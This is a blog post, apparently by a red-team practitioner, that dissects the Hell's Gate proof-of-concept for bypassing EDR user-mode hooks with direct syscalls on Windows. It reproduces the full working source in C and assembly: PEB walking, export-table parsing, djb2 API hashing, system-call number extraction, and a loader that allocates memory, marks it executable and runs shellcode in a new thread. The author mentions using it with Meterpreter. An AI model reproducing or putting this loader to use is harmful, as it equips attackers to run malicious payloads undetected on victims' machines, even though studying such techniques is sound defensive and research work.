Disclaimer
There is a great paper by Hell's Gate founders am0nsec and RtlMateusz. But as always, the best way for me to learn about a topic is to dig deep into it and make a presentation or write a blog post. I'm not making any claims, I'm just trying to understand Hell's Gate and share it with the infosec community. The Hell's Gate
POC can be found here.
Introduction
To avoid user mode hooks from EDRs, an attacker (red team) can use several techniques to get rid of user mode hooks by unhooking or bypassing user mode hooks using direct or indirect syscalls. In this blog post I will focus on the Hell's Gate
POC, which uses direct syscalls to bypass user mode hooks. Although the POC is a few years old, in my opinion it was one of the most important steps or POCs in the evolution of direct syscalls in the past. Also, I want to understand the code better, so reason enough to take a closer look at it.
In general, why was Hell's Gate introduced, or what problem does it solve? Instead of hardcoding System Service Numbers
(SSN) or syscall IDs into a direct syscall POC, the Hell's Gate technique allows us to dynamically retrieve SSNs
from native functions at runtime from ntdll.dll
. But why do we need this? The reason is simple: SSNs
can vary from Windows to Windows or version to version, and in a real-world scenario or red team engagement, we usually do not know what Windows or version the target is running. Therefore, hardcoding the SSNs
could be risky and fail.
Dynamic retrieval of SSNs
Regardless of whether we use a direct or indirect syscall shellcode loader, if we do not want to hardcode the SSNs
from the native functions we use in our loader, we need to find a way to dynamically retrieve the SSNs
from ntdll.dll
at runtime. To achieve this, we can use several different techniques, as shown in the following examples.
- Using
GetModuleHandleA
andGetProcAddress
PEB
walk combined withEAT
parsing- Build your own
GetModuleHandleA
andGetProcAddress
functions
I think the simplest technique in this case is to open a handle to ntdll.dll
by using GetModuleHandleA to get the base address of ntdll.dll
. Then use GetProcAddress to get the memory address of a native function in ntdll.dll
, e.g. NtAllocateVirtualMemory. However, from an opsec perspective, this is not really recommended, because if GetModuleHandleA
and/or GetProcAddress
is hooked by the EDR, you will be caught. Therefore, among other things, we are going to take a closer look at how SSN
retrieval is done in Hell's Gate by going through the PEB
and the EAT
parsing.
Hell's Gate in a nutshell
In short, based on various defined structures, functions etc., Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs
via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table
(EAT) from ntdll.dll
, opcode comparison from the syscall stub of the native functions and extracting the SSNs
. The main steps can be briefly described as follows.
- The first step is to access to the Thread Environment Block (TEB)
- From there, access the
PEB
- Go through the
PEB
and get the base address fromntdll.dll
- Access the
EAT
fromntdll.dll
- Use
djb2
hashing on all native functions in the code - Hash the function names retrieved from
EAT
using thedjb2
algorithm - Compare the hashed function names with the hashed entries in
EAT
- If they match, store the function address in
VX_TABLE
asVX_TABLE_ENTRY
. - Based on the (absolut)
function address
, do an opcode comparison of thesyscall stub
from the native functions in ntdll.dll to check if the function is hooked or not. - Additionally, based on checking the opcodes for the
syscall
andreturn
instruction, check if they are not too far apart to avoid executing a wrong native function or syscall. - Use the
HellsGate
function to prepare the execution of a direct syscall. - Use the
HellDescent
function to proceed the execution of a direct syscall
To get a better understanding of the Hell's Gate POC in detail, we will break it down and take a closer look at it. We will start by having a look at the manually defined structures.
Hell's Gate Structures
typedef struct _VX_TABLE_ENTRY {
PVOID pAddress;
DWORD64 dwHash;
WORD wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
Starting at the top of the code, we can identify two defined structures called _VX_TABLE_ENTRY
and _VX_TABLE
. The first structure _VX_TABLE_ENTRY
contains three different data types and builds the template for the entries in the second structur or table_VX_TABLE
.
pAddress
holds the memory address of a native function e.g.NtAllocateVirtualMemory
dwHash
stores thedjb2
hash of a function e.g.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b
wSystemCall
holds theSSN
of a native function e.g.NtAllocateVirtualMemory
typedef struct _VX_TABLE {
VX_TABLE_ENTRY NtAllocateVirtualMemory;
VX_TABLE_ENTRY NtProtectVirtualMemory;
VX_TABLE_ENTRY NtCreateThreadEx;
VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;
Based on _VX_TABLE_ENTRY
, _VX_TABLE
then holds pAddress
, dwHash
and wSystemCall
for each entry in the table, and each entry represents one of four native functions used in Hell's Gate. The _VX_TABLE
contains all the necessary data for the preparation and execution of the direct syscalls.
In short, these structures are used to store and organise the data that is later used in the code to execute direct syscalls. This way they can be easily looked up and accessed when they need to be called. The SSNs
or syscalls are called directly, not through ntdll.dll
, so their function addresses
and SSNs
need to be stored somewhere, which is what these structures are used for.
Hell's Gate Functions
In the next step, Hell's Gate defines different types of functions that will be used in the code. Let us take a closer look at each function.
RtlGetThreadEnvironmentBlock
PTEB RtlGetThreadEnvironmentBlock();
The RtlGetThreadEnvironmentBlock()
function is used to get a pointer PTEB
to the TEB
of the current thread, it is a data structure that stores information about the state of the current thread. Later we will see that getting the address from the TEB
is necessary to get the address from the PEB
.
PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
return (PTEB)__readgsqword(0x30);
#else
return (PTEB)__readfsdword(0x16);
#endif
}
It checks the _WIN64
macro to determine if the code is being compiled for a 64-bit Windows platform. If it is, then the intrinsic function __readgsqword(0x30)
is used to read a quadword (64 bits) from a specific offset (0x30
) in the GS segment, which contains the TEB
on 64-bit Windows. If the code is compiled for a 32-bit Windows platform (if _WIN64
is not defined), then the intrinsic function __readfsdword(0x16)
is used instead to read a double word (32 bits) from a different offset (0x16
) in the FS segment, which contains the TEB on 32-bit Windows. Both intrinsic functions return a pointer (PTEB
) to the TEB
which is returned by the RtlGetThreadEnvironmentBlock
function.
GetImageExportDirectory
BOOL GetImageExportDirectory(
_In_ PVOID pModuleBase,
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);
The purpose of the GetImageExportDirectory
function is to retrieve the _Image_Export_Directory
of a given module. Later, when we look at the main function, we will see that the GetImageExportDirectory
function is used to get the address of the _IMAGE_EXPORT_DIRECTORY
of the ntdll.dll
module.
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
// Get DOS header
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
return FALSE;
}
// Get NT headers
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
return FALSE;
}
// Get the EAT
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
return TRUE;
}
The GetImageExportDirectory
function basically parses a module in memory to find and return a pointer to its export directory. This directory is crucial when the code needs to find a function exported by a DLL by name, as it contains all the exported function names and their corresponding relativ virtual addresses (RVA
).
Specifically, the GetImageExportDirectory
function does the following:
- To read the structure of a PE file, we first need to get a pointer
pImageDosHeader
to the_IMAGE_DOS_HEADER
. By checking thee_magic
field we make sure that we are really reading a PE file, it's not equal to the expected value, the function will returnFALSE
, indicating that the PE file is invalid or the provided one. - Once we have the address to the
_IMAGE_DOS_HEADER
, we can access e_lfanew, which is a field in the DOS header that contains the fileoffset
to the NT headers. Again, validation is implemented by checking that the_IMAGE_NT_HEADER
starts with theSignature
field. - Finally, access the
Export Address Table (EAT)
, which is part of the_IMAGE_OPTIONAL_HEADER32
and can be accessed via the DataDirectory: The first entry in theDataDirectory
(index 0) is the_IMAGE_EXPORT_DIRECTORY
, which contains information about the functions from the module, in case ofntdll.dll
e.g.NtAllocateVirtualMemory
,NtProtectVirtualMemory
etc.
Later we will see that the base address
from ntdll.dll
and the address from the _IMAGE_EXPORT_DIRECTORY
in EAT
are needed to access the following three entries in the _IMAGE_EXPORT_DIRECTORY
:
- AddressOfFunctions
- AddressOfNames
- AddressOfNamesOrdinales
These in turn are needed to finally get the (absolute) memory address of the native functions, e.g. NtAllocateVirtualMemory
. But more on this later.
djb2 Hashing
DWORD64 djb2(PBYTE str) {
DWORD64 dwHash = 0x7734773477347734;
INT c;
while (c = *str++)
dwHash = ((dwHash << 0x5) + dwHash) + c;
return dwHash;
}
The djb2
function calculates the djb2 hash
for a given string. Why is this function needed? Later we will see that in the context of the GetVxTableEntry
function, djb2
is used to hash the name of each function in the EAT
. These hashes are then compared to the dwHash
field of the pVxTableEntry
structure.
GetVxTableEntry
BOOL GetVxTableEntry(
_In_ PVOID pModuleBase,
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probably too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
cw++;
};
}
}
return TRUE;
}
In short, based on the base address
from ntdll.dll
and the _IMAGE_EXPORT_DIRECTORY
, the GetVxTableEntry
function is responsible for calculating the absolute memory address of a native function in memory in ntdll.dll
. It is also responsible for checking, based on an opcode comparison or validation, whether the native function is hooked or not. If it is not hooked, it retrieves the SSN
and stores it in the appropriate VX_TABLE_ENTRY
in the wSystemCall
variable. But to better understand this function, let us break it down.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
pVxTableEntry->pAddress = pFunctionAddress;
In the first part, GetVxTableEntry
creates pointers to the AddressOfFunctions
, AddressOfNames
and AddressOfNameOrdinals
arrays in the _IMAGE_EXPORT_DIRECTORY
. These arrays contain the relative virtual address (RVA
) of a function, the function name and the function ordinal respectively.
It then iterates through all the function names in the AddressOfNames
array. For each name, it calculates the djb2 hash
and compares it to the hash passed in the VX_TABLE_ENTRY
structure. If the hashes match, it means that the function has been found. The absolut address of the function is then calculated by adding the base address from ntdll.dll
to the RVA
from the function. Then the absolute address is stored in the pFunctionAddress
variable or in the VX_TABLE_ENTRY
structure within the pAddress
variable.
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probably too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
// First opcodes should be :
// MOV R10, RCX
// MOV RCX, <syscall>
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
break;
}
In the second part of the GetVxTableEntry
function, Hell's Gate uses the address of a native function to look for that function in the memory of ntdll.dll
. It then looks for bytes 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00
from the native function's syscall stub and compares them to certain values in the code. It starts at 0x4c
from the native function and compares byte by byte in the opcode sequence until it reaches the second null byte
.
If we look at the figure above, we can see that these values represent the opcode or bytes from an unhooked or clean syscall stub from a native function. If the comparison is correct or the native function is not hooked, the SSN
will be extracted and stored in the corresponding VxTableEntry
in _VX_TABLE
in the form of the wSystemCall
variable. This procedure is done for all four functions in _VX_TABLE
.
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
return FALSE;
// check if ret, in this case we are also probably too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
return FALSE;
In an effort to avoid accidentally finding the wrong System Service Number
(SSN) for another system call
, the code uses two if
statements at the start of the loop. These statements check for the syscall
and ret
instructions that mark the end of a system call
. If the loop encounters these end-of-call instructions without finding the opcode
sequence 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00
it means that the correct SSN
wasn't found and extracting the correct SSN
will fail. This helps to keep the search accurate and in context.
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low
To finally extract the SSN
from the syscall
stub, the code reads the 5th
and 4th bytes
starting from 0x4c
. First the high byte
(most significant byte (5th)) of the syscall ID
is extracted, then the low byte
(least significant byte (4th)). These two bytes
are then combined to form the complete syscall ID
.
While the data is stored in memory in little-endian format (low byte at the lower address and high byte at the higher address), the code reads the high byte
first and the low byte
second. However, it then correctly shifts the high byte
8 places to the left (high << 8
) and combines it with the low byte
to construct the correct 16-bit syscall ID
, respecting the little-endian format.
Payload
BOOL Payload(
_In_ PVX_TABLE pVxTable
);
BOOL Payload(PVX_TABLE pVxTable) {
NTSTATUS status = 0x00000000;
char shellcode[] = "\xfc\x48\x83";
// Allocate memory for the shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
// Write Memory
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
// Change page permissions
ULONG ulOldProtect = 0;
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
// Create thread
HANDLE hHostThread = INVALID_HANDLE_VALUE;
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
// Wait for 1 seconds
/*LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;*/
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
status = HellDescent(hHostThread, FALSE, NULL);
return TRUE;
}
The payload
function is nothing special, based on the external functions HellsGate
and HellsDescent
, it is simply responsible for executing the direct syscalls to allocate virtual memory, copy the shellcode into memory, execute it etc. In the context of running meterpreter shellcode
, I was able to observe that it was necessary to comment out the timeout
code part within the NtWaitForSingleObject
. Otherwise the execution of the meterpreter shellcode failed.
VxMoveMemory
PVOID VxMoveMemory(
_Inout_ PVOID dest,
_In_ const PVOID src,
_In_ SIZE_T len
);
The purpose of the VxMoveMemory
function is to copy a block of memory from one location (src) to another (dest). It is similar in purpose to the memcpy function in the standard C library, but has a custom implementation for this code. The function is used to copy the shellcode
into memory. In my opinion, this function is not essential and could be replaced by memcpy
or the native NtWriteVirtualMemory
function.
extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();
; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
HellDescent PROC
mov r10, rcx
mov eax, wSystemCall
syscall
ret
HellDescent ENDP
end
In addition, Hell's Gate defines two external functions called HellsGate
and HellDescent
, which will be used to prepare and execute direct system calls.
The first procedure, HellsGate
, takes an argument (the system call number) in the ecx
register. The instruction mov wSystemCall, 000h
initialises the variable wSystemCall
to zero, but the next instruction mov wSystemCall, ecx
immediately overwrites it with the value in ecx
. This procedure is used to store the system call number in the global variable wSystemCall
for later use.
The second procedure, HellDescent
, actually executes the system call. The syscall instruction in x64 Windows expects the system call number to be in the eax
register and the parameters to the system call to be in rcx
, rdx
, r8
and r9
. This procedure first moves the contents of rcx
to r10
because the syscall instruction will overwrite the rcx
register, and then loads the system call number (SSN) from wSystemCall
into eax
. Subsequently the syscall
instruction is used to execute the syscall.
Hell's Gate Main Function
INT wmain() {
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
return 0x1;
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
return 0x1;
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
return 0x1;
Payload(&Table);
return 0x00;
}
Last but not least, let us have a look at the main function
and try to understand how it all fits together. Therefore we want to break down the main function in Hell's Gate.
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
To get the base address
from ntdll.dll
without using the GetModuleHandleA
API, we need to go through the PEB
, but first we need to declare a pointer pCurrentPeb
to the TEB
structure from the current process.
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
Next, the pointer pCurrentPeb
is declared, pointing to the PEB
. Based on the pointer pCurrentTeb
pointing to the TEB
, the PEB
structure can be accessed using the ->
operator.
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
In addition, Hell's Gate checks that the PEB
and TEB
have been successfully retrieved and that the major version of the operating system is 10
. This means Hell's Gate expects to be running on Windows 10
(since the main version number for Windows 10 is 10
, or 0xA
in hex). If it's running on a different version of Windows, the function will exit immediately with a return code of 0x1
.
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
With the next line of code, Hell's Gate gets a pointer PLDR_DATA_TABLE_ENTRY
to the LDR_DATA_TABLE_ENTRY structure and holds the address of the second entry ntdll.dll
within LDR_DATA_TABLE_ENTRY
in the variable pLdrDataEntry
. In my opinion this line of code is very important to understand the concept of going through PEB
(PEB walk) to get the base address
of a module, lets break down this line of code to get a better understanding. I will chunk the line of code and explain it step by step.
pCurrentPeb->LoaderData
This accesses the LoaderData
member of the PEB
structure. The LoaderData
member points to a PEB_LDR_DATA
structure which contains information about the modules (DLLs) that have been loaded into the process.
pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink
The InMemoryOrderModuleList member is a double-linked list containing LDR_DATA_TABLE_ENTRY structures for each module, sorted in the order they were loaded into memory. The Flink
member is a pointer to the next entry in the linked list. In this case it's pointing to the entry for the main executable
module of the process.
Additional information: A double linked list is a type of linked list in which each node contains a reference to both the next node and the previous node in the sequence.
pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink
By following the Flink
member twice we now point to the second entry in the InMemoryOrderModuleList
, which is usually the ntdll.dll
module.
(PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10
This does pointer arithmetic to subtract 0x10
(16 in decimal) from the address of the ntdll.dll
entry in the InMemoryOrderModuleList
. This step is necessary because the InMemoryOrderModuleList
is part of a larger structure (LDR_DATA_TABLE_ENTRY
) and Flink
is not the first member of that structure. So subtracting 0x10
gives us the start of the LDR_DATA_TABLE_ENTRY
structure for ntdll.dll
.
(PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)
Here we'll cast the resulting address to a PLDR_DATA_TABLE_ENTRY
pointer. This gives us a pointer to the LDR_DATA_TABLE_ENTRY
structure for ntdll.dll
.
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)
Finally, we store this pointer in the pLdrDataEntry
variable. After this line of code, pLdrDataEntry
points to the LDR_DATA_TABLE_ENTRY
structure for ntdll.dll
. Based on this, we can access the base address of ntdll.dll
in the next line of code.
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
Now, we call the GetImageExportDirectory
function to access the EAT
from ntdll.dll
.
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
First, the initialisation { 0 }
sets all members of the VX_TABLE
structure to zero. Representative for the other functions, the variable dwHash
for the VX_TABLE
entry NtAllocateVirtualMemory
is set to the corresponding djb2
hash. Next, the GetVxTableEntry
function is called. Remember that this function is used to get the absolute address of the corresponding function (in this case for NtAllocateVirtualMemory
) in the ntdll.dll
memory. The GetVxTableEntry
function is also responsible for doing the opcode comparison, extracting the SSN
of the native function and storing it in the variable wSystemCall
as long as the comparison was successful or the native function is not hooked. Then the Payload
function is executed, which uses the externally declared HellsGate
and HellDescent
functions to execute the direct syscalls to allocate virtual memory, copy shellcode, etc.
Summary
In this blog post we took a closer look at the Hell's Gate code and saw how Hell's Gate exploits the execution of direct syscalls by dynamically retrieving the SSNs
from ntdll.dll
without using the GetModuleHandleA
and GetProcAddress
APIs. In general, the opcode comparison to extract the SSNs
from ntdll.dll
can still be used, but it is not recommended because if the EDR hooks any or all of the native functions used in the POC, Hell's Gate would fail. Therefore, Sektor7 created an evolution of Hell's Gate, which is called Halos Gate. In comparison to Hell's Gate, Halos Gate can also be used to dynamically retrieve SSNs
from ntdll.dll
, even if the function is hooked by an EDR. In addition, the POC Tartarus Gate uses the same concept as Halos Gate.
Happy Hacking!
Daniel Feichter @VirtualAllocEx